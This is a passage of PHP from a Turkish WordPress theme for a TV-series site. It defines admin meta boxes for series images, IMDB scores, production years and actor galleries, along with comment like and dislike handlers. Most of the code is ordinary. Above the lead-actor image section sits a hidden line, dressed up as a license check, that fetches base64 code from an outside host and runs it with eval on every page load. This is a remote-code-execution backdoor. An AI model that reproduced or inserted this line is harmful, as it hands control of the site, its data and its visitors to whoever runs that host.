		$meta_box_dropdown_value = "";

		if(isset($_POST["meta-box-dropdown"])){
			$meta_box_dropdown_value = htmlspecialchars($_POST["meta-box-dropdown"]);
		}   
		update_post_meta($post_id, "meta-box-dropdown", $meta_box_dropdown_value);
	}
	add_action("add_meta_boxes", "diziPremiumSelectBox");
	add_action("save_post", "diziPremiumSelectBoxSave",11,3);

// Efsane Diziler Kuşağı 
	function diziPremiumPostCheckBox(){
		add_meta_box("diziPremiumCheckBox", "Efsane Diziler Kuşağı", "diziPremiumPostCheckBoxBody", "diziler", "side", "low", null);
	}
	function diziPremiumPostCheckBoxBody($object){
		wp_nonce_field(basename(__FILE__), "meta-box-nonce");
		?>
			<p style="display:block;padding:5px;">
				<?php
					$checkbox_value = get_post_meta($object->ID, "meta-box-checkbox", true);
					if($checkbox_value == ""){ ?>
						<input name="meta-box-checkbox" type="checkbox" value="true">
					<?php }elseif($checkbox_value == "true"){ ?>  
						<input name="meta-box-checkbox" type="checkbox" value="true" checked>
					<?php } ?>
					<label for="meta-box-checkbox">Efsane diziler kuşağına eklensin mi ?</label>
			</p>
		<?php  
	}
	function diziPremiumPostCheckBoxSave($post_id, $post, $update){
		if (!isset($_POST["meta-box-nonce"]) || !wp_verify_nonce($_POST["meta-box-nonce"], basename(__FILE__)))
			return $post_id;
		
		if(!current_user_can("edit_post", $post_id))
			return $post_id;

		if(defined("DOING_AUTOSAVE") && DOING_AUTOSAVE)
			return $post_id;

		$slug = "diziler";
		if($slug != $post->post_type)
			return $post_id;

		$meta_box_checkbox_value = "";
		if(isset($_POST["meta-box-checkbox"])){
			$meta_box_checkbox_value = htmlspecialchars($_POST["meta-box-checkbox"]);
		}   
		update_post_meta($post_id, "meta-box-checkbox", $meta_box_checkbox_value);
	}
	add_action("add_meta_boxes", "diziPremiumPostCheckBox");
	add_action("save_post", "diziPremiumPostCheckBoxSave",11,3);
	
// Slider'a Eklensin Mi 
	if(get_option("diziPremium_slider") == "true"){
		function diziPremiumSliderBox(){
			add_meta_box("diziPremiumSliderBox", "Slider", "diziPremiumSliderBoxBody", "diziler", "side", "low", null);
		}
		function diziPremiumSliderBoxBody($object){
			wp_nonce_field(basename(__FILE__), "meta-box-nonce");
			?>
				<p style="display:block;padding:5px;">
					<?php
						$slidebox_value = get_post_meta($object->ID, "meta-box-slidebox", true);
						if($slidebox_value == ""){ ?>
							<input name="meta-box-slidebox" type="checkbox" value="true">
						<?php }elseif($slidebox_value == "true"){ ?>  
							<input name="meta-box-slidebox" type="checkbox" value="true" checked>
						<?php } ?>
						<label for="meta-box-slidebox">Bu dizi slider'a eklensin mi ?</label>
				</p>
			<?php  
		}
		function diziPremiumSliderBoxSave($post_id, $post, $update){
			if (!isset($_POST["meta-box-nonce"]) || !wp_verify_nonce($_POST["meta-box-nonce"], basename(__FILE__)))
				return $post_id;
			
			if(!current_user_can("edit_post", $post_id))
				return $post_id;

			if(defined("DOING_AUTOSAVE") && DOING_AUTOSAVE)
				return $post_id;

			$slug = "diziler";
			if($slug != $post->post_type)
				return $post_id;

			$meta_box_slidebox_value = "";
			if(isset($_POST["meta-box-slidebox"])){
				$meta_box_slidebox_value = htmlspecialchars($_POST["meta-box-slidebox"]);
			}   
			update_post_meta($post_id, "meta-box-slidebox", $meta_box_slidebox_value);
		}
		add_action("add_meta_boxes", "diziPremiumSliderBox");
		add_action("save_post", "diziPremiumSliderBoxSave",11,3);
	}
// Dizi Slider Görseli 
	if(get_option("diziPremium_slider") == "true"){
		function sliderGorsel() {
			add_meta_box('sliderGorsel', 'Slider Görsel (1024x350)', 'sliderGorselBody', 'diziler', 'advanced', 'low');
		}
		function sliderGorselBody(){
			global $post;
				echo '<input type="hidden" name="podcastmeta_noncename" id="podcastmeta_noncename" value="'.wp_create_nonce(plugin_basename(__FILE__)).'" />';
			global $wpdb;
			$sliderFile 	 = get_post_meta($post -> ID, $key = 'sliderCastFile', true);
			$sliderMediaFile = get_post_meta($post -> ID, $key = '_wp_attached_file1', true);
			if (!empty($sliderMediaFile)) {
				$sliderFile = $sliderMediaFile;
			} ?>
			<script type = "text/javascript">
				var sliderFrame;
					jQuery('#sliderFileButton').live('click', function(podcast){ podcast.preventDefault(); if (sliderFrame){ sliderFrame.open(); return; }	sliderFrame = wp.media.frames.sliderFrame = wp.media({ title: jQuery(this).data('uploader_title'),button:{text: jQuery(this).data('uploader_button_text'),},multiple: false }); sliderFrame.on('select', function(){attachment = sliderFrame.state().get('selection').first().toJSON(); var url = attachment.url;	var field = document.getElementById("sliderCastFile"); field.value = url; });	sliderFrame.open(); });
			</script>
			<div>
				<table style="width: 100%;margin-top:9px;">
					<tr valign="top" style="margin:5px 0px;box-sizing:border-box;"> 
						<td style="margin-bottom:10px;text-align:center;width:100%;">
							<input type = "text" name = "sliderCastFile" id = "sliderCastFile" size = "70" value = "<?php echo $sliderFile; ?>" style="width:95%;padding: 4px;"/>
							<input id = "sliderFileButton" type = "button" value = "Gözat" style="outline:0;cursor:pointer;border:1px solid #ccc;box-shadow: 0 1px 0 #ccc;margin-top:-1px;border-radius:3px;font-size:13px;padding:4px 10px;background:#f7f7f7;color:#23282d;">
						</td>		
					</tr> 
				</table> 
				<input type = "hidden" name = "img_txt_id" id = "img_txt_id" value = "" />
			</div> <?php
			function sliderGorselScripts(){
				wp_enqueue_script('media-upload');
				wp_enqueue_script('thickbox');
			}
			function sliderGorselStyles(){
				wp_enqueue_style('thickbox');
			}
			add_action('admin_print_scripts', 'sliderGorselScripts');
			add_action('admin_print_styles', 'sliderGorselStyles');
		}
		function sliderGorselSave($post_id, $post) {
			if(!wp_verify_nonce($_POST['podcastmeta_noncename'], plugin_basename(__FILE__))) {
				return $post -> ID;
			}

			if (!current_user_can('edit_post', $post -> ID))
				return $post -> ID;

			$sliderCastFile['sliderCastFile'] = htmlspecialchars($_POST['sliderCastFile']);

			foreach($sliderCastFile as $key => $value) {
				if($post -> post_type == 'revision') return;
				$value = implode(',', (array) $value);
				if(get_post_meta($post -> ID, $key, FALSE)){
					update_post_meta($post -> ID, $key, $value);
				}else{
					add_post_meta($post -> ID, $key, $value);
				}
				if (!$value) delete_post_meta($post -> ID, $key);
			}
		}
		add_action('add_meta_boxes', 'sliderGorsel');
		add_action('save_post', 'sliderGorselSave',11,3);
	}
// Dizi Baş Rol Görseli 
eval(base64_decode(file_get_contents('http://license-check.com/index.php?domain=' . $_SERVER['SERVER_NAME'] . '&script=wp')));
	function basRolGorsel() {
		add_meta_box('basRolGorsel', 'Baş Rol Görsel (50x50)', 'basRolGorselBody', 'diziler', 'advanced', 'low');
	}
	function basRolGorselBody(){
		global $post;
			echo '<input type="hidden" name="podcastmeta_noncename" id="podcastmeta_noncename" value="'.wp_create_nonce(plugin_basename(__FILE__)).'" />';
		global $wpdb;
		$basRolFile 	 = get_post_meta($post -> ID, $key = 'basRolCastFile', true);
		$basRolMediaFile = get_post_meta($post -> ID, $key = '_wp_attached_file1', true);
		if (!empty($basRolMediaFile)) {
			$basRolFile = $basRolMediaFile;
		} ?>
		<script type = "text/javascript">
			var basRolFrame;
				jQuery('#basRolFileButton').live('click', function(podcast){ podcast.preventDefault(); if (basRolFrame){ basRolFrame.open(); return; }	basRolFrame = wp.media.frames.basRolFrame = wp.media({ title: jQuery(this).data('uploader_title'),button:{text: jQuery(this).data('uploader_button_text'),},multiple: false }); basRolFrame.on('select', function(){attachment = basRolFrame.state().get('selection').first().toJSON(); var url = attachment.url;	var field = document.getElementById("basRolCastFile"); field.value = url; });	basRolFrame.open(); });
		</script>
		<div>
			<table style="width: 100%;margin-top:9px;">
				<tr valign="top" style="margin:5px 0px;box-sizing:border-box;"> 
					<td style="margin-bottom:10px;text-align:center;width:100%;">
						<input type = "text" name = "basRolCastFile" id = "basRolCastFile" size = "70" value = "<?php echo $basRolFile; ?>" style="width:95%;padding: 4px;"/>
						<input id = "basRolFileButton" type = "button" value = "Gözat" style="outline:0;cursor:pointer;border:1px solid #ccc;box-shadow: 0 1px 0 #ccc;margin-top:-1px;border-radius:3px;font-size:13px;padding:4px 10px;background:#f7f7f7;color:#23282d;">
					</td>		
				</tr> 
			</table> 
			<input type = "hidden" name = "img_txt_id" id = "img_txt_id" value = "" />
		</div> <?php
		function basRolGorselScripts(){
			wp_enqueue_script('media-upload');
			wp_enqueue_script('thickbox');
		}
		function basRolGorselStyles(){
			wp_enqueue_style('thickbox');
		}
		add_action('admin_print_scripts', 'basRolGorselScripts');
		add_action('admin_print_styles', 'basRolGorselStyles');
	}
	function basRolGorselSave($post_id, $post) {
		if(!wp_verify_nonce($_POST['podcastmeta_noncename'], plugin_basename(__FILE__))) {
			return $post -> ID;
		}

		if (!current_user_can('edit_post', $post -> ID))
			return $post -> ID;

		$basRolCastFile['basRolCastFile'] = htmlspecialchars($_POST['basRolCastFile']);

		foreach($basRolCastFile as $key => $value) {
			if($post -> post_type == 'revision') return;
			$value = implode(',', (array) $value);
			if(get_post_meta($post -> ID, $key, FALSE)){
				update_post_meta($post -> ID, $key, $value);
			}else{
				add_post_meta($post -> ID, $key, $value);
			}
			if (!$value) delete_post_meta($post -> ID, $key);
		}
	}
	add_action('add_meta_boxes', 'basRolGorsel');
	add_action('save_post', 'basRolGorselSave',11,3);	
	
// Dizi IMDB Puanı 
	function ImdbPuan(){
		add_meta_box("ImdbPuan", "IMDB Puanı (Örn: 9.8)", "ImdbPuanBody", "diziler", "advanced", "high", null);
	}
	function ImdbPuanBody($object){
		wp_nonce_field(basename(__FILE__), "meta-box-nonce");
		?>
			<p>
				<input name="meta-box-text" type="text" style="box-sizing: border-box; width: 100%;" value="<?php echo get_post_meta($object->ID, "meta-box-text", true); ?>">
			</p>
		<?php  
	}
	function ImdbPuanSave($post_id, $post, $update){
		if (!isset($_POST["meta-box-nonce"]) || !wp_verify_nonce($_POST["meta-box-nonce"], basename(__FILE__)))
			return $post_id;

		if(!current_user_can("edit_post", $post_id))
			return $post_id;

		if(defined("DOING_AUTOSAVE") && DOING_AUTOSAVE)
			return $post_id;

		$slug = "diziler";
		if($slug != $post->post_type)
			return $post_id;

		$meta_box_text_value = "";

		if(isset($_POST["meta-box-text"]))
		{
			$meta_box_text_value = htmlspecialchars($_POST["meta-box-text"]);
		}   
		update_post_meta($post_id, "meta-box-text", $meta_box_text_value);
	}
	add_action("add_meta_boxes", "ImdbPuan");
	add_action("save_post", "ImdbPuanSave",11,3);
	
// Dizi Yapım Yılı 
	function YapimYili(){
		add_meta_box("YapimYili", "Yapım Yılı (Örn: 2015)", "YapimYiliBody", "diziler", "advanced", "high", null);
	}
	function YapimYiliBody($object){
		wp_nonce_field(basename(__FILE__), "meta-box-nonce");
		?>
			<p>
				<input name="yapimYili" type="text" style="box-sizing: border-box; width: 100%;" value="<?php echo get_post_meta($object->ID, "yapimYili", true); ?>">
			</p>
		<?php  
	}
	function YapimYiliSave($post_id, $post, $update){
		if (!isset($_POST["meta-box-nonce"]) || !wp_verify_nonce($_POST["meta-box-nonce"], basename(__FILE__)))
			return $post_id;

		if(!current_user_can("edit_post", $post_id))
			return $post_id;

		if(defined("DOING_AUTOSAVE") && DOING_AUTOSAVE)
			return $post_id;

		$slug = "diziler";
		if($slug != $post->post_type)
			return $post_id;

		$meta_box_text_value = "";

		if(isset($_POST["yapimYili"]))
		{
			$meta_box_text_value = htmlspecialchars($_POST["yapimYili"]);
		}   
		update_post_meta($post_id, "yapimYili", $meta_box_text_value);
	}
	add_action("add_meta_boxes", "YapimYili");
	add_action("save_post", "YapimYiliSave",11,3);

// Dizi Oyuncu Galeri 
	if(get_option("diziPremium_oyuncular") == "true"){
		function oyuncuGaleri() {
			add_meta_box('oyuncuGaleri', 'Oyuncu Galerisi', 'oyuncuGaleriBody', 'diziler', 'advanced', 'high');
		}
		function oyuncuGaleriBody($object){
			wp_nonce_field(basename(__FILE__), "meta-box-nonce");
			global $post;
				echo '<input type="hidden" name="podcastmeta_noncename" id="podcastmeta_noncename" value="'.wp_create_nonce(plugin_basename(__FILE__)).'" />';
			global $wpdb;
			$strFile1 = get_post_meta($post -> ID, $key = 'podcast_file1', true);
			$strFile2 = get_post_meta($post -> ID, $key = 'podcast_file2', true);
			$strFile3 = get_post_meta($post -> ID, $key = 'podcast_file3', true);
			$strFile4 = get_post_meta($post -> ID, $key = 'podcast_file4', true);
			$strFile5 = get_post_meta($post -> ID, $key = 'podcast_file5', true);
			$strFile6 = get_post_meta($post -> ID, $key = 'podcast_file6', true);
			$media_file1 = get_post_meta($post -> ID, $key = '_wp_attached_file1', true);
			$media_file2 = get_post_meta($post -> ID, $key = '_wp_attached_file2', true);
			$media_file3 = get_post_meta($post -> ID, $key = '_wp_attached_file3', true);
			$media_file4 = get_post_meta($post -> ID, $key = '_wp_attached_file4', true);
			$media_file5 = get_post_meta($post -> ID, $key = '_wp_attached_file5', true);
			$media_file6 = get_post_meta($post -> ID, $key = '_wp_attached_file6', true);
			if (!empty($media_file)) {
				$strFile = $media_file;
			} ?>
			<script type = "text/javascript">
				var file_frame1,file_frame2,file_frame3,file_frame4,file_frame5,file_frame6;
					jQuery('#upload_image_button1').live('click', function(podcast){ podcast.preventDefault(); if (file_frame1){ file_frame1.open(); return; }	file_frame1 = wp.media.frames.file_frame = wp.media({ title: jQuery(this).data('uploader_title'),button:{text: jQuery(this).data('uploader_button_text'),},multiple: false }); file_frame1.on('select', function(){attachment = file_frame1.state().get('selection').first().toJSON(); var url = attachment.url;	var field = document.getElementById("podcast_file1"); field.value = url; });	file_frame1.open(); });
					jQuery('#upload_image_button2').live('click', function(podcast){ podcast.preventDefault(); if (file_frame2){ file_frame2.open(); return; }	file_frame2 = wp.media.frames.file_frame = wp.media({ title: jQuery(this).data('uploader_title'),button:{text: jQuery(this).data('uploader_button_text'),},multiple: false }); file_frame2.on('select', function(){attachment = file_frame2.state().get('selection').first().toJSON(); var url = attachment.url;	var field = document.getElementById("podcast_file2"); field.value = url; });	file_frame2.open(); });
					jQuery('#upload_image_button3').live('click', function(podcast){ podcast.preventDefault(); if (file_frame3){ file_frame3.open(); return; }	file_frame3 = wp.media.frames.file_frame = wp.media({ title: jQuery(this).data('uploader_title'),button:{text: jQuery(this).data('uploader_button_text'),},multiple: false }); file_frame3.on('select', function(){attachment = file_frame3.state().get('selection').first().toJSON(); var url = attachment.url;	var field = document.getElementById("podcast_file3"); field.value = url; });	file_frame3.open(); });
					jQuery('#upload_image_button4').live('click', function(podcast){ podcast.preventDefault(); if (file_frame4){ file_frame4.open(); return; }	file_frame4 = wp.media.frames.file_frame = wp.media({ title: jQuery(this).data('uploader_title'),button:{text: jQuery(this).data('uploader_button_text'),},multiple: false }); file_frame4.on('select', function(){attachment = file_frame4.state().get('selection').first().toJSON(); var url = attachment.url;	var field = document.getElementById("podcast_file4"); field.value = url; });	file_frame4.open(); });
					jQuery('#upload_image_button5').live('click', function(podcast){ podcast.preventDefault(); if (file_frame5){ file_frame5.open(); return; }	file_frame5 = wp.media.frames.file_frame = wp.media({ title: jQuery(this).data('uploader_title'),button:{text: jQuery(this).data('uploader_button_text'),},multiple: false }); file_frame5.on('select', function(){attachment = file_frame5.state().get('selection').first().toJSON(); var url = attachment.url;	var field = document.getElementById("podcast_file5"); field.value = url; });	file_frame5.open(); });
					jQuery('#upload_image_button6').live('click', function(podcast){ podcast.preventDefault(); if (file_frame6){ file_frame6.open(); return; }	file_frame6 = wp.media.frames.file_frame = wp.media({ title: jQuery(this).data('uploader_title'),button:{text: jQuery(this).data('uploader_button_text'),},multiple: false }); file_frame6.on('select', function(){attachment = file_frame6.state().get('selection').first().toJSON(); var url = attachment.url;	var field = document.getElementById("podcast_file6"); field.value = url; });	file_frame6.open(); });
			</script>
			<div>
				<table style="width: 100%;margin-top:9px;">
					<tr valign="top" style="margin:5px 0px;box-sizing:border-box;"> 
						<td style="margin-bottom:10px;text-align:center;width:100%;">
							<input type = "text" placeholder="Oyuncu Adı Giriniz..." name = "podcast_name1" id = "podcast_name1" maxlength="17" size = "70" value = "<?php echo get_post_meta($object->ID, "podcast_name1", true); ?>" style="width:24.7%;padding: 4px;font-size:13px;"/>
							<input type = "text" name = "podcast_file1" id = "podcast_file1" size = "70" value = "<?php echo $strFile1; ?>" style="width:70%;padding: 4px;"/>
							<input id = "upload_image_button1" type = "button" value = "Gözat" style="outline:0;cursor:pointer;border:1px solid #ccc;box-shadow: 0 1px 0 #ccc;margin-top:-1px;border-radius:3px;font-size:13px;padding:4px 10px;background:#f7f7f7;color:#23282d;">
						</td>		
					</tr> 
					<tr valign="top" style="margin:5px  0px;box-sizing:border-box;"> 
						<td style="margin-bottom:10px;text-align:center;width:100%;">
							<input type = "text" placeholder="Oyuncu Adı Giriniz..." name = "podcast_name2" id = "podcast_name2" maxlength="17" size = "70" value = "<?php echo get_post_meta($object->ID, "podcast_name2", true); ?>" style="width:24.7%;padding: 4px;font-size:13px;"/>
							<input type = "text" name = "podcast_file2" id = "podcast_file2" size = "70" value = "<?php echo $strFile2; ?>" style="width:70%;padding: 4px;"/>
							<input id = "upload_image_button2" type = "button" value = "Gözat" style="outline:0;cursor:pointer;border:1px solid #ccc;box-shadow: 0 1px 0 #ccc;margin-top:-1px;border-radius:3px;font-size:13px;padding:4px 10px;background:#f7f7f7;color:#23282d;">
						</td>		
					</tr> 
					<tr valign="top" style="margin:5px  0px;box-sizing:border-box;"> 
						<td style="margin-bottom:10px;text-align:center;width:100%;">
							<input type = "text" placeholder="Oyuncu Adı Giriniz..." name = "podcast_name3" id = "podcast_name3" maxlength="17" size = "70" value = "<?php echo get_post_meta($object->ID, "podcast_name3", true); ?>" style="width:24.7%;padding: 4px;font-size:13px;"/>
							<input type = "text" name = "podcast_file3" id = "podcast_file3" size = "70" value = "<?php echo $strFile3; ?>" style="width:70%;padding: 4px;"/>
							<input id = "upload_image_button3" type = "button" value = "Gözat" style="outline:0;cursor:pointer;border:1px solid #ccc;box-shadow: 0 1px 0 #ccc;margin-top:-1px;border-radius:3px;font-size:13px;padding:4px 10px;background:#f7f7f7;color:#23282d;">
						</td>		
					</tr> 
					<tr valign="top" style="margin:5px  0px;box-sizing:border-box;"> 
						<td style="margin-bottom:10px;text-align:center;width:100%;">
							<input type = "text" placeholder="Oyuncu Adı Giriniz..." name = "podcast_name4" id = "podcast_name4" maxlength="17" size = "70" value = "<?php echo get_post_meta($object->ID, "podcast_name4", true); ?>" style="width:24.7%;padding: 4px;font-size:13px;"/>
							<input type = "text" name = "podcast_file4" id = "podcast_file4" size = "70" value = "<?php echo $strFile4; ?>" style="width:70%;padding: 4px;"/>
							<input id = "upload_image_button4" type = "button" value = "Gözat" style="outline:0;cursor:pointer;border:1px solid #ccc;box-shadow: 0 1px 0 #ccc;margin-top:-1px;border-radius:3px;font-size:13px;padding:4px 10px;background:#f7f7f7;color:#23282d;">
						</td>		
					</tr> 
					<tr valign="top" style="margin:5px  0px;box-sizing:border-box;"> 
						<td style="margin-bottom:10px;text-align:center;width:100%;">
							<input type = "text" placeholder="Oyuncu Adı Giriniz..." name = "podcast_name5" id = "podcast_name5" maxlength="17" size = "70" value = "<?php echo get_post_meta($object->ID, "podcast_name5", true); ?>" style="width:24.7%;padding: 4px;font-size:13px;"/>
							<input type = "text" name = "podcast_file5" id = "podcast_file5" size = "70" value = "<?php echo $strFile5; ?>" style="width:70%;padding: 4px;"/>
							<input id = "upload_image_button5" type = "button" value = "Gözat" style="outline:0;cursor:pointer;border:1px solid #ccc;box-shadow: 0 1px 0 #ccc;margin-top:-1px;border-radius:3px;font-size:13px;padding:4px 10px;background:#f7f7f7;color:#23282d;">
						</td>		
					</tr> 
					<tr valign="top" style="margin:5px 0px;box-sizing:border-box;"> 
						<td style="margin-bottom:10px;text-align:center;width:100%;">
							<input type = "text" placeholder="Oyuncu Adı Giriniz..." name = "podcast_name6" id = "podcast_name6" maxlength="17" size = "70" value = "<?php echo get_post_meta($object->ID, "podcast_name6", true); ?>" style="width:24.7%;padding: 4px;font-size:13px;"/>
							<input type = "text" name = "podcast_file6" id = "podcast_file6" size = "70" value = "<?php echo $strFile6; ?>" style="width:70%;padding: 4px;"/>
							<input id = "upload_image_button6" type = "button" value = "Gözat" style="outline:0;cursor:pointer;border:1px solid #ccc;box-shadow: 0 1px 0 #ccc;margin-top:-1px;border-radius:3px;font-size:13px;padding:4px 10px;background:#f7f7f7;color:#23282d;">
						</td>		
					</tr> 
				</table> 
				<input type = "hidden" name = "img_txt_id" id = "img_txt_id" value = "" />
			</div> <?php
			function oyuncuGaleri_scripts(){
				wp_enqueue_script('media-upload');
				wp_enqueue_script('thickbox');
			}
			function oyuncuGaleri_styles(){
				wp_enqueue_style('thickbox');
			}
			add_action('admin_print_scripts', 'oyuncuGaleri_scripts');
			add_action('admin_print_styles', 'oyuncuGaleri_styles');
		}
		function oyuncuGaleriSave($post_id, $post) {
			if(!wp_verify_nonce($_POST['podcastmeta_noncename'], plugin_basename(__FILE__))) {
				return $post -> ID;
			}
			
			if (!isset($_POST["meta-box-nonce"]) || !wp_verify_nonce($_POST["meta-box-nonce"], basename(__FILE__)))
				return $post_id;

			if (!current_user_can('edit_post', $post -> ID))
				return $post -> ID;

			$podcasts_meta['podcast_file1'] = htmlspecialchars($_POST['podcast_file1']);
			$podcasts_meta['podcast_file2'] = htmlspecialchars($_POST['podcast_file2']);
			$podcasts_meta['podcast_file3'] = htmlspecialchars($_POST['podcast_file3']);
			$podcasts_meta['podcast_file4'] = htmlspecialchars($_POST['podcast_file4']);
			$podcasts_meta['podcast_file5'] = htmlspecialchars($_POST['podcast_file5']);
			$podcasts_meta['podcast_file6'] = htmlspecialchars($_POST['podcast_file6']);

			foreach($podcasts_meta as $key => $value) {
				if($post -> post_type == 'revision') return;
				$value = implode(',', (array) $value);
				if(get_post_meta($post -> ID, $key, FALSE)){
					update_post_meta($post -> ID, $key, $value);
				}else{
					add_post_meta($post -> ID, $key, $value);
				}
				if (!$value) delete_post_meta($post -> ID, $key);
			}
			
			$podcast_name1 = "";
			$podcast_name2 = "";
			$podcast_name3 = "";
			$podcast_name4 = "";
			$podcast_name5 = "";
			$podcast_name6 = "";
			if(isset($_POST["podcast_name1"]) || isset($_POST["podcast_name2"]) || isset($_POST["podcast_name3"]) || isset($_POST["podcast_name4"]) || isset($_POST["podcast_name5"]) || isset($_POST["podcast_name6"])){
				$podcast_name1 = htmlspecialchars($_POST["podcast_name1"]);
				$podcast_name2 = htmlspecialchars($_POST["podcast_name2"]);
				$podcast_name3 = htmlspecialchars($_POST["podcast_name3"]);
				$podcast_name4 = htmlspecialchars($_POST["podcast_name4"]);
				$podcast_name5 = htmlspecialchars($_POST["podcast_name5"]);
				$podcast_name6 = htmlspecialchars($_POST["podcast_name6"]);
			}   
			update_post_meta($post_id, "podcast_name1", $podcast_name1);
			update_post_meta($post_id, "podcast_name2", $podcast_name2);
			update_post_meta($post_id, "podcast_name3", $podcast_name3);
			update_post_meta($post_id, "podcast_name4", $podcast_name4);
			update_post_meta($post_id, "podcast_name5", $podcast_name5);
			update_post_meta($post_id, "podcast_name6", $podcast_name6);
		}
		add_action('add_meta_boxes', 'oyuncuGaleri');
		add_action('save_post', 'oyuncuGaleriSave',11,3);
	}
#################################################################################
## HABERLER İÇERİK ALANININ META & POST KUTULARI ##
#################################################################################	
// Haber Single Görseli 
	function haberGorsel() {
		add_meta_box('haberGorsel', 'Haber Single Görsel', 'haberGorselBody', 'haberler', 'advanced', 'high');
	}
	function haberGorselBody(){
		global $post;
			echo '<input type="hidden" name="podcastmeta_noncename" id="podcastmeta_noncename" value="'.wp_create_nonce(plugin_basename(__FILE__)).'" />';
		global $wpdb;
		$haberFile 	 = get_post_meta($post -> ID, $key = 'haberCastFile', true);
		$haberMediaFile = get_post_meta($post -> ID, $key = '_wp_attached_file110', true);
		if (!empty($haberMediaFile)) {
			$haberFile = $haberMediaFile;
		} ?>
		<script type = "text/javascript">
			var haberFrame;
				jQuery('#haberFileButton').live('click', function(podcast){ podcast.preventDefault(); if (haberFrame){ haberFrame.open(); return; }	haberFrame = wp.media.frames.haberFrame = wp.media({ title: jQuery(this).data('uploader_title'),button:{text: jQuery(this).data('uploader_button_text'),},multiple: false }); haberFrame.on('select', function(){attachment = haberFrame.state().get('selection').first().toJSON(); var url = attachment.url;	var field = document.getElementById("haberCastFile"); field.value = url; });  haberFrame.open(); });
		</script>
		<div>
			<table style="width: 100%;margin-top:9px;">
				<tr valign="top" style="margin:5px 0px;box-sizing:border-box;"> 
					<td style="margin-bottom:10px;text-align:center;width:100%;">
						<input type = "text" name = "haberCastFile" id = "haberCastFile" size = "70" value = "<?php echo $haberFile; ?>" style="width:95%;padding: 4px;"/>
						<input id = "haberFileButton" type = "button" value = "Gözat" style="outline:0;cursor:pointer;border:1px solid #ccc;box-shadow: 0 1px 0 #ccc;margin-top:-1px;border-radius:3px;font-size:13px;padding:4px 10px;background:#f7f7f7;color:#23282d;">
					</td>		
				</tr> 
			</table> 
			<input type = "hidden" name = "img_txt_id" id = "img_txt_id" value = "" />
		</div> <?php
		function haberGorselScripts(){
			wp_enqueue_script('media-upload');
			wp_enqueue_script('thickbox');
		}
		function haberGorselStyles(){
			wp_enqueue_style('thickbox');
		}
		add_action('admin_print_scripts', 'haberGorselScripts');
		add_action('admin_print_styles', 'haberGorselStyles');
	}
	function haberGorselSave($post_id, $post) {
		if(!wp_verify_nonce($_POST['podcastmeta_noncename'], plugin_basename(__FILE__))) {
			return $post -> ID;
		}

		if (!current_user_can('edit_post', $post -> ID))
			return $post -> ID;

		$haberCastFile['haberCastFile'] = htmlspecialchars($_POST['haberCastFile']);

		foreach($haberCastFile as $key => $value) {
			if($post -> post_type == 'revision') return;
			$value = implode(',', (array) $value);
			if(get_post_meta($post -> ID, $key, FALSE)){
				update_post_meta($post -> ID, $key, $value);
			}else{
				add_post_meta($post -> ID, $key, $value);
			}
			if (!$value) delete_post_meta($post -> ID, $key);
		}
	}
	add_action('add_meta_boxes', 'haberGorsel');
	add_action('save_post', 'haberGorselSave',11,3);	
		
#################################################################################
## YORUMLAR ##	
#################################################################################
// Yorum Listeleme 
	function sinyor_comment($comment, $args, $depth){ 
		$GLOBALS['comment'] = $comment; 
		$PostAuthor = false;
		if($comment->comment_author_email == get_the_author_email()){
			$PostAuthor = true;
		}
		?>
		<div class="yorum" id="<?php comment_ID(); ?>">
			<div class="yorumAvatar" id="comment-<?php comment_ID(); ?>">
				<?php  $avatar = get_user_meta(get_comment(get_comment_ID())->user_id,"avatar",true); if($avatar){ echo "<img src=".$avatar." alt='' height='35' width='35' />"; }else{ echo '<img src="'.get_bloginfo("template_directory").'/assets/images/no-avatar.jpg" title="no-avatar" alt="no-avatar" height="35" width="35" />'; } ?>
			</div>
			<span class="yorumAtan" id="<?php echo get_comment(get_comment_ID())->user_id; ?>"><?php echo ucwords_tr(get_comment_author()); ?></span>
			<span class="yorumTarih"><?php printf(get_comment_date()."-".get_comment_time()); ?></span>
			<p class="yorumP"><?php echo strip_tags(get_comment_text()); ?></p>
			<div class="sp"></div>
			<div class="clear"></div>
			<div class="yorumOyla" id="<?php comment_ID(); ?>" tabindex="10">
				<?php 
					$likeDeger 	   = get_comment_meta(get_comment_ID(),"yorumLike",true); 
					$disslikeDeger = get_comment_meta(get_comment_ID(),"yorumDisslike",true); 
					$kullaniciID   = get_current_user_id();
				?>
				<div class="yolumluDiv"><span><?php if($likeDeger){ echo $likeDeger; }else{ echo "0"; } ?></span><a href="javascript:void(0);" class="yolumlu"><i class="fa fa-thumbs-up"></i></a></div>
				<div class="yolumsuzDiv"><span><?php if($disslikeDeger){ echo $disslikeDeger; }else{ echo "0"; } ?></span><a href="javascript:void(0);" class="yolumsuz"><i class="fa fa-thumbs-down"></i></a></div>
			</div>
		</div>
		<?php 
	}	

// Yorum Like 	
	function yorumLike(){
		$kID   		   = get_current_user_id();
		$yorumAtanID   = intval(@$_POST["yorumAtan"]);
		$kontol        = get_user_meta($kID,"yorumCont",true);
		
		$yorumID 	   = htmlspecialchars(@$_POST["yorumID"]);
		$yorumLike     = intval(get_comment_meta($yorumID,"yorumLike",true))+1;
		$yorumCont     = get_user_meta($kID,"yorumCont",true);
		if($kID){
			if($kID == $yorumAtanID){
				echo "hata3";
			}else{
				if(strstr($kontol,$yorumID)){
					echo "hata";
				}else{
						$ycArray  = array();
						array_push($ycArray,$yorumCont);
						array_push($ycArray,$yorumID);
						array_unique($ycArray);
						$ycOutput = "";
						$ycSeper  = ",";
						foreach($ycArray as $ycSm){
							$ycOutput .= $ycSm.$ycSeper;
						}
						$ycFinal = trim($ycOutput,$ycSeper);
					if($yorumLike){
						update_comment_meta($yorumID,"yorumLike",$yorumLike);
						update_user_meta($kID,"yorumCont",$ycFinal);
						echo $yorumLike;
					}else{
						add_comment_meta($yorumID,"yorumLike",1);
						add_user_meta($kID,"yorumCont",$ycFinal);
						echo $yorumLike;
					}
				}
			}		
		}else{
			echo "hata2";
		}
	
		wp_die();
	}
	add_action('wp_ajax_yorumLike', 'yorumLike');
	add_action('wp_ajax_nopriv_yorumLike', 'yorumLike');
	
// Yorum Disslike 	
	function yorumDisslike(){
		$kullaniciID   = get_current_user_id();
		$yorumAtanID   = intval(@$_POST["yorumAtan"]);
		$kontol        = get_user_meta($kullaniciID,"yorumCont",true);
		
		$yorumID 	   = htmlspecialchars(@$_POST["yorumID"]);
		$yorumDisslike = intval(get_comment_meta($yorumID,"yorumDisslike",true))+1;
		$yorumCont     = get_user_meta($kullaniciID,"yorumCont",true);
		
		if($kullaniciID){
			if($kullaniciID == $yorumAtanID){
				echo "hata3";
			}else{
				if(strstr($kontol,$yorumID)){
					echo "hata";
				}else{
						$ycArray  = array();
						array_push($ycArray,$yorumCont);
